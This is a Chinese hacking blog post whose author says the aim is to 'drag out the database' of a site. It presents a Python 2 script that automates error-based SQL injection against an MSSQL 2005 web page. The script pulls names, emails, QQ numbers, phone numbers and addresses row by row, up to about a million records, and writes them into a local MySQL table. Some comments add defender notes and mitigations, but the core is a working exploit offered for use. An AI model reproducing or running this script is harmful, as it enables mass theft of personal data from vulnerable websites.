P.S:搞一站,目的脱裤,一个MSSQL2005点,不支持Union查询,只要有Cast()就报错,所以就直接写脚本拖库了
此脚本可以直接从抓取页面爆出的数据写入到本地Mysql数据库里~
和上回一样,没来得及完善成通用版本,会Python的稍微改改就好~
复制代码务必在普通IE下复制~
- #!/usr/bin/python
- #encoding=utf-8
- ############################################
- # Coder:Pnig0s1992
- # Auto Dump the Data by using SQLinjection
- # GTalk:pnigos70@gmail.com
- # QQ:459933916
- #Blog:[url=http://pnig0s1992.blog.51cto.com/]http://pnig0s1992.blog.51cto.com/[/url]
- #
- ############################################
- import urllib
- import MySQLdb
- import sys
- def getData(count,val):
- # Error-based SQL injection primitive: one HTTP GET per (row offset, column name).
- # count: zero-based row offset, spliced into `select top <count>` to skip rows already read.
- # val:   column name, spliced raw into the query string (no escaping).
- # Returns the text between the first '[' and ']' of the response body, i.e. whatever
- # quotename() bracketed; the `=0` comparison is what makes the server surface it
- # (presumably via a verbose DB conversion error reaching the client -- not confirmed here).
- # Defender notes: the keyWord parameter carries `quotename(`, `cast(`, `not in (select top`
- # and a trailing `--`; the `top N` counter increases monotonically across requests, and
- # each record costs one request per column, so rate plus that pattern is the detection handle.
- # Mitigation on the target side: parameterized queries and no DB error text in responses.
- tempurl="http://www.xxx.com/xxx.aspx?keyWord=1' and (select top 1 quotename(cast("+val+" as varchar(8000))) from xxx.dbo.xxx where cast("+val+" as varchar) not in (select top "+str(count)+" \
- cast("+val+" as varchar) from xxx.dbo.xxx))=0--"
- # safe= keeps the SQL punctuation unencoded; only spaces and the like become '+'.
- quoteUrl=urllib.quote_plus(tempurl,safe='\':/?-&*.=-()')
- feed = urllib.urlopen(quoteUrl)
- # Only the first 2048 bytes of the response are inspected.
- getItem = feed.read(2048)
- IBegin = getItem.find('[')+1
- IEnd = getItem.find(']')
- data = getItem[IBegin:IEnd].strip()
- feed.close()
- return data
- # Entry point: prints a banner, reads count(*) of the remote table with the same
- # error-based technique, then walks a hard-coded range of row offsets, pulling
- # eleven columns per row via getData() and inserting each row into a local MySQL
- # table `data.xxxdata`. Python 2 syntax (print statement, `except Exception,e`).
- # Defender notes: the columns pulled (name, email, QQ, phone, address, ...) are
- # personal data; the loop bound (1012750) and the one-request-per-column pattern
- # mean a successful run is a very long, steady, single-parameter request stream.
- if __name__ == "__main__":
- print "\t\tCode by:Pnig0s1992\t\t"
- print "\t\tGTalk:pnigos70@gmail.com\t\t"
- print "\t\tQQ:459933916\t\t"
- # Row-count probe: same '[' ... ']' extraction as getData(), different payload.
- url="http://www.xxx.com/xxx.aspx?keyWord=1' \
- and (select quotename(count(*)) from xxx.dbo.xxx)=0--"
- enurl = urllib.quote_plus(url,safe='\':/?-&*.=-()')
- fd = urllib.urlopen(enurl)
- getSum = fd.read(2048)
- Begin = getSum.find('[')+1
- End = getSum.find(']')
- print "%s 's items for all" % getSum[Begin:End]
- print "Holding for dumping...."
- # Loop bound is hard-coded rather than taken from the count probed above.
- for count in xrange(0,1012750):
- print "The No.%d items:" % (count+1)
- sname = getData(count,'SNAME')
- print "Name:%s" % sname
- content = getData(count,'CONTENT')
- print "Content:%s" % content
- sex = getData(count,'G_SEX')
- print "Sex:%s" % sex
- g_mail = getData(count,'G_MAIL')
- print "Email:%s" % g_mail
- g_qq = getData(count,'G_QQ')
- print "QQ:%s" % g_qq
- g_sj = getData(count,'G_SJ')
- print "MobilPhone:%s" % g_sj
- g_tel = getData(count,'G_TEL')
- print "Tel:%s" % g_tel
- g_adds = getData(count,'G_ADDS')
- print "Address:%s" % g_adds
- g_post = getData(count,'G_POST')
- print "PostalNum:%s" % g_post
- g_time = getData(count,'G_TIME')
- print "Date:%s" % g_time
- g_url = getData(count,'G_URL')
- print "Url:%s" % g_url
- # A new connection is opened on every iteration and never closed; credentials are hard-coded.
- try:
- conn = MySQLdb.connect(host="localhost",port=3306,user="root",passwd="root",db="data")
- except Exception,e:
- print "Connect database failed."
- sys.exit()
- cursor = conn.cursor()
- # Values fetched from the remote site are interpolated into the local INSERT with %-formatting.
- sql = "insert into xxxdata(SNAME,CONTENT,G_sex,G_mail,G_QQ,G_SJ,G_Tel,G_adds,G_post,G_time,\
- G_url) values('%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s')" % (sname,content,sex,g_mail,g_qq,g_sj,g_tel,g_adds,g_post,g_time,g_url)
- try:
- cursor.execute(sql)
- except Exception,e:
- print "Insert data failed"
- sys.exit()
- print "Current items has been written to database."
- print ""
本文出自 “About:Blank H4cking” 博客,请务必保留此出处http://pnig0s1992.blog.51cto.com/393390/475733